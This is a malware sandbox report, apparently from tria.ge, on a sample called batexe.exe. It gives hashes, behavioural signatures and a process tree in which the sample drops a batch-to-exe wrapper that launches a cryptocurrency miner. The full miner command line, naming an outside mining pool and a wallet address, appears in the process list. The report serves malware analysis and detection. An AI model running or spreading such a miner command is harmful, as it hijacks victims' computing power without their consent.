Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
295s -
max time network
305s -
platform
windows10-1703_x64 -
resource
win10-20231215-ja -
resource tags
arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
14/02/2024, 09:57
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 860 b2e.exe 3936 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 3936 cpuminer-sse2.exe 3936 cpuminer-sse2.exe 3936 cpuminer-sse2.exe 3936 cpuminer-sse2.exe 3936 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/4348-6-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4348 wrote to memory of 860 4348 batexe.exe 74 PID 4348 wrote to memory of 860 4348 batexe.exe 74 PID 4348 wrote to memory of 860 4348 batexe.exe 74 PID 860 wrote to memory of 4752 860 b2e.exe 75 PID 860 wrote to memory of 4752 860 b2e.exe 75 PID 860 wrote to memory of 4752 860 b2e.exe 75 PID 4752 wrote to memory of 3936 4752 cmd.exe 78 PID 4752 wrote to memory of 3936 4752 cmd.exe 78
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Users\Admin\AppData\Local\Temp\B650.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\B650.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\B650.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BB70.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3936
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10.6MB
MD5d2713ce8cf1f36113cd3e2d8bb2a059a
SHA185feb79b4ea42ca55adeb0889d415be42cd091c5
SHA256d8da87835dd34a5c20345656fe31958c5a7680d42564137f189f1a0d04deeb73
SHA51225e6303d8c1cd4e44a5a1b2cabfe2fcc921587a4889cab2eaf70f0e52e6037621305a9332b41d227a7406b25a3054b23bc8ed0327a5f02e6058a2fa9e9d91b2e
-
Filesize
6.4MB
MD54f7f69275c69ae9c7465de6ade1e57c5
SHA12c8c470f382f2f68519a61800bb7646cfbc06a9c
SHA2561d1a38feebf98d876038ac08880893470f1ba2f5d922cc81a1829227f7c6f3c5
SHA512bcf429e0e666e90ac8b51a00a5d5003794d40df13c2c8d5f4870d04c8036c21095798ab64821a4c02718427080044becd9972aa52c9b24b925ec504b84eebb4b
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
448KB
MD5ca0b33f54480aa9c590d09f72e3feb31
SHA1d50dc7dd964feb0d7516c3037e7dc7e008420ae5
SHA25667833a9e63d8b7469a3a3415124a2426893a6174ce2bd88bea520c68319d182d
SHA512266dcd9c5bfe2b117fda6bf7c4250a908233d8474bd0b09596a0bd0fa2e5bc75446a20b46cb7e516ef75b5661bbe16c714e8dcc5962a0f481cbaecdf6135affd
-
Filesize
256KB
MD5e0c023f2dc80d8f2415830dcaf9b9e45
SHA19806d1f4bd0f76e044071f95f9210b09c2c09fd0
SHA256dc7de4210ed002ed6ab8340d21f999fd77ff9c1fe4361227ebbe3324b24009a0
SHA51276d594de32b07899a478e6b1fbe4a158492174439df3a65478b21135aea9695f47cd6b5006d1bb28398fb1b1f0e64f33e839ae16225fe755bcec4d25d3caf0ef
-
Filesize
54KB
MD55b0e4c645d5f6917662ac594f298a0e3
SHA150a14cfc7ceff156e9f67cf76ecb7837713b8d72
SHA256953c3a0398f106af3e5162a0bfadddfdbca2c5a41267dd3126578f33b7e569ec
SHA51282361bced4183cc545b6925232e0bcd722fa7a2ecbce47ca75220c0a69587bd3047849483bd908979f29b1ea6280d962470af4abf201f4ac88eefdd70c76e0dc
-
Filesize
192KB
MD5d73b46cd072058efc54c4b3885f47e13
SHA184771c2c4f5736ac08497737cba2a8634d9e9178
SHA2563f62bb203bdcca4e489401897e0558cf33ad6fe890a9987f90f5c3894b965b34
SHA512519c91b5b5a82c5a755d7d4295c040cfb6b0f029eb088a6bfc428db11e30d7f954ea6fd6de9b083d1781e1142737ea39572866ab5f669848dff7ef0ce34c79c7
-
Filesize
128KB
MD59746d1ac79c8b499d8b2224394581fa7
SHA136b1985eabfd8131ad9f2b7f69c903a3fce67629
SHA25677941fbe96e0c797e6cf5419ee32bd3fcee69629cba37750146656a660c37182
SHA51261a6174e2aced5b85cd614ad2f9d3da24c6b91e1fc04e10ff818222c4323cd043a59708bd35af0de84b004bf492fbc157d72907cd1e7ddf7082fc2a3563ef183
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
4.6MB
MD54999c0236511b50204920c8acee529ca
SHA1e7a8e5a29cc150384bb6db4886d91ef175b3ce34
SHA2560fcbf9ccf93e53beb366eb7c67fe3d1f747c693ebec4993b90b42620486dc0a9
SHA512febdcbd9b3b090fde0c094b6d5f19e203850803abf074e59e0b023b0a894778e6b4811cc66ef3bf05aaf6f501425d25e3c914a875fec851aecc3fe8a82953856
-
Filesize
4.1MB
MD54c0e3ab97f5a980f9e93748550fc6a8a
SHA1d212bc4c9663ca6e2af4a5c45b5f72099a2f3a84
SHA25694c7a68f43c170c5c8d025b610f879e6225d06f39e249a98831f95644aea8f8c
SHA51202d14c9244c273775887d085ea884f3ae35bffb4c0300106088ded030e22628a58dd4ec93f78482f22a924e719d97cf4afe192a1312920dcdc5349a6068107da
-
Filesize
33KB
MD555abec3ac96795ec5ae278f7a06de029
SHA1c7fb8c90934a06e01a15c2b0dfea6623173edc59
SHA256b45dfc338d2d6fb230bda6d0896ac2e48df26a7e3e3924f196aa5077fabea80f
SHA5123d8a69bfe116e74a5bedbfaf3b6c364244c1b8f129cda9876538dfdbd7027b8336be62bc1ff64757fd1eed4ae4104485806e4f2a0bb1ee6c462d5d45e6452dcc